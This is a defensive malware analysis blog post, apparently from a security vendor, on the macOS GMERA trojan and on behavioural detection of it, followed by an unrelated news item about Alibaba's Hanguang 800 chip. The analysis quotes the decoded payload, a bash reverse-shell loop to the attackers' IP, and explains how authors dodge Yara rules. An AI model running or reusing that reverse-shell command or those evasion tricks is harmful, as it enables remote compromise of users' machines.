As with the GMERA.A variant, the malware comes in a macOS application bundle named “Stockfoli.app”. The name is a letter shy of a genuine app called “Stockfolio.app”, which the malware purports to be a copy of, and which is placed inside the malicious Stockfoli.app’s Resources folder.

image of terminal resources dir

The Stockfolio.app inside the Resources folder appears to be an undoctored version of the genuine app, save for the fact that the malware authors have replaced the original developer’s code signature with their own. We will come back to code signing in the next section.

Of particular note in the Resources folder is the malicious run.sh script. 

image of run shell script

We can see that in this sample the script contains a bunch of lightly encoded base64 and that upon decoding, it will write the contents as a hidden property list file in the ~/Library/LaunchAgents folder with, in this case, the file name .com.apple.upd.plist.

Upon decoding the base64, we see the dropped property list file itself contains more encoded base64 in its Program Arguments.

image of launch agent decoded

Further decoding reveals a bash script that opens a reverse shell to the attackers’ C2.

while :; do sleep 10000; screen -X quit; lsof -ti :25733 | xargs kill -9; screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25733 0>&1'; done

The code sleeps for 10000 seconds, then quits and kills any previous connection. The screen utility is then used to start a new session in ‘detached’ mode. This essentially allows the attacker to resume the same session if the connection should drop at any point. The script then invokes Bash’s interactive mode to redirect the session to the attackers device at the URL shown above across port 25733. In their write-up, the Trend Micro researchers reported seeing the reverse shell used over ports 2573325736. Disassembly of the main binary in our sample shows that two further ports, 25737 and 25738, may also be utilized, with the latter used with zsh rather than bash as the shell of choice.

image of hopper and ports

Before we move on to discuss detection and response, let’s note one further characteristic of the malware not pointed out in the previous research. The malicious Stockfoli.app’s Info plist is being distributed with at least two different bundle identifiers (we’re sure there will be more). These are:

com.appIe.stockf.stocks
com.appIe.stockfolioses.Stockfoli

Looked at casually, those look like they begin with ‘com.apple’. But closer inspection (or changing the font) reveals that the ‘l’ in “apple” is in fact a capital “I”.

com.appIe.stockf.stocks
com.appIe.stockfolioses.Stockfoli

We will come back to the reason for this ruse below. 

CERT REVOKED WHACK-A-MOLE

Let’s turn to detection and response. If you’re a Mac user running an unprotected Mac (i.e., you’re not using a Next-Gen solution like SentinelOne), you might be glad to hear that these malicious samples should now fail to execute if you try to download and run them. That’s due to the fact that Apple have since revoked the code signature used to sign these samples. 

image of cert revoked

While it’s great to see Apple on the ball and revoking the signatures of known malware, this kind of after-the-fact protection shouldn’t provide as much comfort as some seem to take from it. A fellow macOS enthusiast remarked to me after this latest discovery that Apple’s action proved to him that Macs are secure against malware, to which my somewhat more circumspect response was: how long was this malware in the wild before it was discovered and the signature revoked? How many users were infected by this malware before it became publicly known? How many unknown, validly signed malware samples are still out there?

It won’t be long before the threat actors package their wares in a newly signed bundle and the game of whack-a-mole begins again: attackers create and distribute a malicious app with a valid code signature; after some variable amount of time in the wild, the malware is discovered and Apple revoke the signature; the attackers then repackage the malware with a fresh signature and the process begins all over again!

If you’re the victim, a day, an hour, or even a minute is too late if you’re relying on this kind of mechanism to protect you. In fact, it inherently relies on some people becoming victims in order for samples to be discovered and signatures revoked in the first place. Cold comfort if you’re one of the unfortunate early victims!

Perhaps not widely appreciated is just how easy it is for bad actors to acquire valid code signing identities. Given the rewards, bad actors are quite happy to burn $99 subscriptions and play whack-a-mole with Apple. This is relatively easy to do as there are many fake and compromised (i.e., hacked) AppleIDs that can be turned into developer signatures using stolen credit cards and other payment methods. 

Repackaging the same malicious script inside a new app bundle with a new cert is a task that can be automated with very little effort; it is a technique we see the commodity adware and PUP players use on a daily basis.

YARA YARA, YADA YADA…

To be fair, Apple don’t just rely on revoking certs of discovered malware though. Indeed, they have been talking a lot about ‘defense in depth’ recently (WWDC 2019), and as regular readers of this blog will know, Apple have a suite of built-in tools like Gatekeeper, XProtect and MRT to help block and remediate known malware. With the upcoming Catalina release, Apple will add compulsory notarization to their armoury, too.

These tools rely on a combination of different strategies, from extended file attributes, hardcoded file paths and hashes to Yara rules that specify particular characteristics of a binary. While hashes and file paths are typically limited to a single variant of malware, Yara rules at least have the advantage that they can be used to identify families of malware that share similar characteristics. Here’s an example from XProtect:

image of xprotect yara rule

This Yara rule specifies five sets of strings that, if they all appear in a Mach-O executable with a file size of less than 200KB, then XProtect should block this as a member of the malware family MACOS.6175e25. Let’s translate those strings from hex to see what they actually are:

image of xprotect yara rule

To be clear, this rule has nothing to do with the GMERA malware under discussion here. At the time of writing, neither XProtect nor MRT.app have been updated to detect GMERA malware. The point here is to show how Yara rules in general work. The rule shown above is in fact for some malware we’ve reversed before. From the malware author’s point of view, it is easy to see just what XProtect is hitting on, and with that knowledge, to adapt his or her work. 

But wouldn’t that be difficult? Not at all. It’s far less work for malware authors than it is for Apple. A simple trick for malware authors to use to avoid Yara rules like the above is simply to rename methods (it would only take a letter different to break that rule above), or to use an encoding like base64, which can be encoded multiple times. There really are numerous ways to make minor changes that will break Yara rules. Meanwhile, Apple (and 3rd party security vendors that rely on the same techniques) have to wait until the changes come to light, then test and update their revised signatures. All the while, the threat actors are achieving compromises while Apple and other vendors continually have to play catch-up, knowing full-well that their updated signatures will be obsolete within hours.

A crucial part of this unwinnable game is that, as with revoking certs, file paths, hashes and Yara rules all have one fatal weakness: they rely on prior discovery of a sample. Once again, after-the-fact detection is no solace for the before-everyone-else-heard-about-it victims.

Beating macOS Malware By Detecting Suspicious Behavior

Fortunately, there is another way to detect and block malware which doesn’t rely on prior knowledge. Malware and threat actors have limited and specific goals. While the implementation details can be vast and varied, the actual behavior required to meet those objectives is both finite and definable.  With a behavioral detection engine, the implementation details become entirely irrelevant. 

Just as we do not detect criminals by looking at the way their brains are wired or measuring the shape and size of their skulls (anymore!) but rather by assessing the way they act against expected social and legal norms, so we can do the same with malicious software, scripts and processes. 

Regardless of the inner wiring, malicious processes – like criminals – engage in certain kinds of undesirable behavior. By tracking and contextualizing individual events in the process lifecycle, we can put together a picture or ‘story’ that says:

“Taken together, these events constitute undesirable behavior and we should alert on and/or block them.”

By focusing on dynamic behavior rather than relying on static characteristics like strings, hashes and paths, we can identify malware even if we have not seen its particular implementation previously.

This is the principle behind SentinelOne’s behavioral and AI engines. Although I can’t go into the actual details of how SentinelOne does its magic under the hood, we can get a sense of how behavioral detection works in principle by looking at the GMERA malware as an example. 

As we have seen, the macOS.GMERA malware writes a persistence agent to ~/Library/LaunchAgents. If you were manually threat hunting on macOS, a newly written LaunchAgent would immediately cause you to investigate further, and the same can be true for automated responses. We also saw that in the case of the GMERA malware, the parent process dropped a persistence agent that was made invisible in the Finder by prefixing a period to the filename. 

image of hidden launch agent

That should raise our suspicion even further. Such behavior is not only unusual for legitimate software but is also behavior that has no legitimate purpose. The primary reason for allowing processes to write invisible files is to hide temporary data and metadata that have no conceivable interest to the user. While there may be a few other legitimate uses (such as DRM licensing and such like), there’s little reason why a genuine persistence agent should be invisible to the user in the Finder. 

Thirdly, this LaunchAgent’s behavior itself is anomalous. Rather than executing a file at a given path, it decodes and executes in memory a script that is obfuscated with base64. While there’s no doubt some conceivable edge case where this might be legitimate, in the typical enterprise situation such behaviour is almost certainly designed to deceive and something we should be alerting on. Even the edge cases are worthy of our attention, if only to encourage wayward users to engage in better, safer and more transparent practices.

Finally, as we noted above, the parent application uses a bundle Identifier that is clearly intended to mislead. 

This is a sleight-of-hand intended to trick unwary users, who may easily overlook such a process as benign. The tactic may also trick some unsophisticated security solutions that check whether processes with a “com.apple” bundle identifier are actually signed with Apple’s signature. Replacing the ‘l’ in Apple with a capital ‘I’ would neatly sidestep such a heuristic. 

If you were writing a detection engine, you might consider that as something to look out for – homograph attacks are a tried and trusted technique in URL and Domain Name spoofing – but you might equally well not care either way. It matters less what a file is called and more what it does. A hidden persistence mechanism opening a reverse shell in memory that has been dropped by an application with no apparent functional relation? What could be more suspicious than that?

Detecting GMERA Malware Through Behavioral Inspection

So much for the theory, but does it work in practice? Despite the fact the GMERA malware application bundle itself will fail to run once the cert has been revoked (unless we were to remove the code signing or resign it with an ad hoc cert), it is still perfectly possible to execute the malicious run.sh script bundled in the application’s Resources folder without complaint from Apple’s built-in security tools. That means we can still test a significant part of the malware’s behaviour. And of course, it means an attacker could do this manually, and so could another malicious process that found the Stockfoli.app bundle lying around, perhaps in a subsequent infection incident.

Let’s see how the SentinelOne behavioral engine reacts to execution of the run.sh script. As soon as we execute the script, we get a detection on the Agent side.

image of agent detection

We can see more details on the Management console side:

image of management console

Note the MITRE ATT&CK TTPs:

Process dropped a hidden suspicious plist to achieve persistency {T1150}
Process wrote a hidden file to achieve persistency {T1158}
Process achieved persistency through launchd job {T1160}

As we have set the policy on our test machine to detect rather than block — so that we can inspect the malware’s behavior — SentinelOne lets the script continue its execution. The Attack Story Line shows the hierarchy of processes and the entire kill chain.

image of attack story line

Of course, in a live deployment you would set the policy to simply block this at the outset. For research purposes, however, the Detect Only policy is useful to examine the malware’s behavior and learn more about our adverseries’ TTPs.

Conclusion

The recently discovered GMERA malware doesn’t offer anything new in terms of attacker tools, tactics and procedures. It leverages a fairly well-worn, easily-constructed route to compromise and persistence: a fake app, a Launch Agent for persistence and a simple bash or zsh-based reverse shell to open the victim up to post-exploitation, data exfiltration and perhaps further infection. And yet, so many solutions – including Apple’s built-in offerings – fail to detect these kind of threats pre-execution or on-execution, instead relying on discovery and software updates to belatedly offer protection to those that were lucky enough to avoid becoming victims in the first wave.

A solution that offers real defense-in-depth, with multiple static, behavioral and AI engines packaged in a single agent is the only way to stay ahead of attackers and protect your Mac users from whatever new threat comes next. Remember, malware authors can innovate to their hearts’ content, but insofar as they keep on acting suspiciously, we can keep on rooting them out. 

Would you like to see how SentinelOne can work for you? Contact us for a free demo.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Alibaba unveils Hanguang 800, an AI inference chip it says significantly increases the speed of machine learning tasks

Alibaba Group introduced its first AI inference chip today, a neural processing unit called Hanguang 800 that it says makes performing machine learning tasks dramatically faster and more energy efficient. The chip, announced today during Alibaba Cloud’s annual Apsara Computing Conference in Hangzhou, is already being used to power features on Alibaba’s e-commerce sites, including product search and personalized recommendations. It will be made available to Alibaba Cloud customers later.

As an example of what the chip can do, Alibaba said it usually takes Taobao an hour to categorize the one billion product images that are uploaded to the e-commerce platform each day by merchants and prepare them for search and personalized recommendations. Using Hanguang 800, Taobao was able to complete the task in only five minutes.

Alibaba is already using Hanguang 800 in many of its business operations that need machine processing. In addition to product search and recommendations, this includes automatic translation on its e-commerce sites, advertising and intelligence customer services.

Though Alibaba hasn’t revealed when the chip will be available to its cloud customers, the chip may help Chinese companies reduce their dependence on U.S. technology as the trade war makes business partnerships between Chinese and American tech companies more difficult. It also can help Alibaba Cloud grow in markets outside of China. Within China, it is the market leader, but in the Asia-Pacific region, Alibaba Cloud still ranks behind Amazon, Microsoft and Google, according to the Synergy Research Group.

Hanguang 800 was created by T-Head, the unit that leads the development of chips for cloud and edge computing within Alibaba DAMO Academy, the global research and development initiative in which Alibaba is investing more than $15 billion. T-Head developed the chip’s hardware and algorithms designed for business apps, including Alibaba’s retail and logistics apps.

In a statement, Alibaba Group CTO and president of Alibaba Cloud Intelligence Jeff Zhang (pictured above) said, “The launch of Hanguang 800 is an important step in our pursuit of next-generation technologies, boosting computing capabilities that will drive both our current and emerging businesses while improving energy-efficiency.”

He added, “In the near future, we plan to empower our clients by providing access through our cloud business to the advanced computing that is made possible by the chip, anytime and anywhere.”

T-Head’s other launches included the XuanTie 910 earlier this year, an IoT processor based on RISC-V, the open-source hardware instruction set that began as a project at UC Berkeley. XuanTie 910 was created for heavy-duty IoT applications, including edge servers, networking, gateway and autonomous vehicles.

Alibaba DAMO Academy collaborates with universities around the world, including UC Berkeley and Tel Aviv University. Researchers in the program focus on machine learning, network security, visual computing and natural language processing, with the goal of serving two billion customers and creating 100 million jobs by 2035.